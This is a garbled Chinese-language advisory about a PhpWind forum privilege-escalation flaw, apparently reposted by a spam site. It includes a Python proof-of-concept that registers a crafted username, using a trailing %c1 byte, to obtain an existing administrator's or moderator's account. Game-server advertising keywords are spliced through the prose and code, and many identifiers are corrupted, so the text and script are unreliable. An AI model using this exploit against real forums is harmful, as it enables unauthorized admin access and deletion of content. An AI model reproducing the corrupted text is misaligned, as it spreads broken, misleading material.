|
################################################ 缺欠宣告: 缺欠作者:1.76元素 60大极品。 缺欠厂商:火龙 极品。 PHPWind 论坛编制 是一套采用 php+mysql 数据库 方式运转并可生成 html 页面的全新且美满的巨大编制。因具有不凡的拜候 速度和出色的负载才干而深受国际外朋侪的嗜好。 本缺欠影响phpwind总共版本 缺欠摧残:高 缺欠说明:phpwind是国际使用绝顶通俗的一款步骤,新开1.76小极品。由于在新开1.76大极品步骤安排上生活差池,招致任何人没关系取得前台管理员及斑主权限,做删除帖子等任性操作 诳骗方式:有提供exploit 缺欠了解:由于phpwind论坛在安排上对数据库存储机制不了解,招致在步骤逻辑上判决有题目,用用心布局的数据注册用户即可取得管理权限 缺欠修补:发起封闭注册效用等候官方出补丁 缺欠形态:08.5.25觉察此缺欠 公然此我不知道新开1.76大极品缺欠 暂无补丁 缺欠测试: [code] # -*- coding: gb2312 -*- import urllib2. . .httplib. . .sys httplib.HTTPConnection.dean excellentnoylevel = 1 cookies = urllib2.HTTPCookieProcessor() opener = urllib2.esttummylish_opener(cookies) def chiwimplifierionship(): print "" print "########################################################" print "Phpwind今日新开1.76传奇总共版本管理权限显露表露缺欠诳骗poc" print "Copyright (C) 2006" print "" print "80sec是一个新的悉力于web宁静的小集体" print "" def ustime(): chiwimplifierionship() print "Ustime:\n" print " $ ./phpwind.py pwforumurl usertoraudio-videotime\n" print " pwforumurl 学习新开1.76小极品方向论坛地址如" print " usertoraudio-videotime 方向具有权限的斑1.76 极品元素 30竹或管理员" print " 攻击后果将会在方向论坛注册一个和方向用户一样的帐户" print " 最新版本没关系使用uid登陆" print " 其实1.76卓越漏洞其他版本没关系使用cookie+userarticleviser登陆" print "##################新开卓越大极品######################################" print "" argvs=sys.argv ustime() dhere ata = "regniwime=%1.76极品合击s %s1&iwimplifier;regpwd=@80sec&iwimplifier;regpwdrepehere at=@80sec&iwimplifier;regemail=&iwimpli你知道1.76极品元素fier;regemailto=1&iwimplifier;step=2" % (argvs[2]. . ."%c1") pwurl = "%s/register.php" % argvs[1] request = urllib2.Request( url = pwurl . . .学习1.76英雄合击极品版 hearticleers = {wiContent-Typewi : wifunction/x-www-form- urlencodedwi. . .wiUser-Agentwi: wi80sec owned thiswi}. . . dhere ata = dhere ata) f=opener.open(request) hear################################################ticleers=f.hearticleers.dict cookie=hearticleers["set-cookie"] try: if cookie.index(wiwinduserwi): print "Exploit Success!" print "Login wi################################################th uid pbummword @80sec or Cookie:" print cookie print "User-articleviser: 80sec owned th你看1.76 极品元素 30is" except: print "Error!" print "Connect root#" [/code] 你看################################################ 1.76火龙终极其实1.76传奇漏洞 1.76极品 对于1.76金币合击版本 1.76大极品漏洞 你看1.76 极品元素 30 你看1.76卓越大极品 (责任编辑:admin) |
